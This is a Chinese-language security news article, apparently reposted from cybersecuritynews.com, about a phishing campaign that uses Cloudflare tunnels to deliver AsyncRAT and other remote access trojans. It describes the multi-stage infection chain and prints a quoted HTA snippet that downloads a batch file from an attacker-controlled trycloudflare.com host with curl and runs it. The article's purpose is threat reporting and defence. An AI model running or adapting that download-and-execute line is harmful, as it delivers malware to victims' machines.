關(guān)鍵詞

惡意軟件

網(wǎng)絡(luò)安全專(zhuān)家發(fā)現(xiàn)了一場(chǎng)復(fù)雜的攻擊活動(dòng)，攻擊者利用 Cloudflare 的隧道基礎(chǔ)設(shè)施來(lái)分發(fā)各種遠(yuǎn)程訪問(wèn)木馬（RAT）。

自 2024 年 2 月以來(lái)，這一基礎(chǔ)設(shè)施展現(xiàn)出了極強(qiáng)的韌性，它被用作惡意文件和木馬的分發(fā)平臺(tái)，使攻擊者能夠未經(jīng)授權(quán)訪問(wèn)受害者的系統(tǒng)。

包括 Forcepoint、Fortinet、Orange 和 Proofpoint 在內(nèi)的安全廠商已記錄下這一持續(xù)存在的威脅，并強(qiáng)調(diào)了其不斷演變的特性以及對(duì)全球各組織日益增長(zhǎng)的影響。

主要的感染途徑始于具有欺騙性的網(wǎng)絡(luò)釣魚(yú)電子郵件，其中包含偽裝成發(fā)票或訂單的惡意附件。

這些電子郵件通常制造虛假的緊迫感，可能還包含偽造的對(duì)話線程和回復(fù)，以使郵件看起來(lái)合法。

附件通常使用 “application/windows-library+xml” 文件格式，與二進(jìn)制文件相比，這種文件格式看似無(wú)害，因此常常能夠繞過(guò)電子郵件安全網(wǎng)關(guān)。

當(dāng)打開(kāi)該文件時(shí)，它會(huì)與托管在 Cloudflare 隧道基礎(chǔ)設(shè)施上的遠(yuǎn)程 WebDav 資源建立連接。

Sekoia 威脅檢測(cè)與研究（TDR）團(tuán)隊(duì)的分析師一直在監(jiān)測(cè)這一攻擊基礎(chǔ)設(shè)施，其內(nèi)部將其稱(chēng)為 “利用 Cloudflare 隧道基礎(chǔ)設(shè)施分發(fā)多種遠(yuǎn)程訪問(wèn)木馬”。

他們的分析揭示了一個(gè)復(fù)雜的多階段感染鏈，該感染鏈采用了多種混淆技術(shù)來(lái)逃避檢測(cè)系統(tǒng)。

即使在 2025 年，此次攻擊的復(fù)雜性也表明了威脅行為者如何持續(xù)開(kāi)發(fā)創(chuàng)新方法來(lái)繞過(guò)現(xiàn)代安全控制措施。

攻擊者利用以 “trycloudflare.com” 為后綴的域名，包括

“malawi-light-pill-bolt.trycloudflare.com”、

“players-time-corresponding-th.trycloudflare.com” 等，

來(lái)托管他們的惡意內(nèi)容。

這一基礎(chǔ)設(shè)施傳送有效載荷，最終在被攻陷的系統(tǒng)上建立持久的遠(yuǎn)程訪問(wèn)權(quán)限，這可能導(dǎo)致數(shù)據(jù)被盜取，以及網(wǎng)絡(luò)遭到進(jìn)一步破壞。

感染鏈機(jī)制

感染過(guò)程始于用戶與偽裝成 PDF 文檔的 LNK 文件進(jìn)行交互。

這個(gè)快捷方式并不會(huì)打開(kāi)合法文檔，而是從同一遠(yuǎn)程服務(wù)器執(zhí)行一個(gè) HTA 文件。HTA 文件的內(nèi)容揭示了攻擊的進(jìn)展過(guò)程：

Set oShell = CreateObject(“WScript.Shell”)
oShell.Run “cmd.exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat”, 0, false
self.Close

這段腳本會(huì)觸發(fā)一個(gè) BAT 文件，該文件會(huì)安裝 Python 并執(zhí)行經(jīng)過(guò)混淆處理的 Python 代碼，然后將下一階段的有效載荷注入到 “notepad.exe” 進(jìn)程中。

為了實(shí)現(xiàn)持久化，惡意軟件會(huì)在 Windows 啟動(dòng)文件夾中放置兩個(gè) VBS 文件和另一個(gè) BAT 文件來(lái)創(chuàng)建啟動(dòng)項(xiàng)。

最后一個(gè)階段使用 PowerShell 反射性地加載從帶有嵌入式 base64 編碼有效載荷的 JPEG 圖像中下載的有效載荷。

這就建立了遠(yuǎn)程訪問(wèn)木馬（RAT）與它的命令控制服務(wù)器之間的連接，通常會(huì)使用像 “duckdns.org” 這樣的動(dòng)態(tài) DNS 服務(wù)進(jìn)行通信。

感染鏈通過(guò)涉及 Windows 庫(kù)文件、LNK 文件、HTA 執(zhí)行和 Python 注入的復(fù)雜多階段過(guò)程來(lái)分發(fā) AsyncRAT。

這場(chǎng)攻擊活動(dòng)的演變表明，威脅行為者在不斷調(diào)整他們的技術(shù)以繞過(guò)安全控制，這凸顯了采用多層檢測(cè)方法以及持續(xù)監(jiān)測(cè)類(lèi)似攻擊模式的重要性。

來(lái)源：https://cybersecuritynews.com/hackers-abuse-cloudflare-tunnel-infrastructure/

安全圈

網(wǎng)羅圈內(nèi)熱點(diǎn) 專(zhuān)注網(wǎng)絡(luò)安全

實(shí)時(shí)資訊一手掌握！

好看你就分享 有用就點(diǎn)個(gè)贊

支持「安全圈」就點(diǎn)個(gè)三連吧！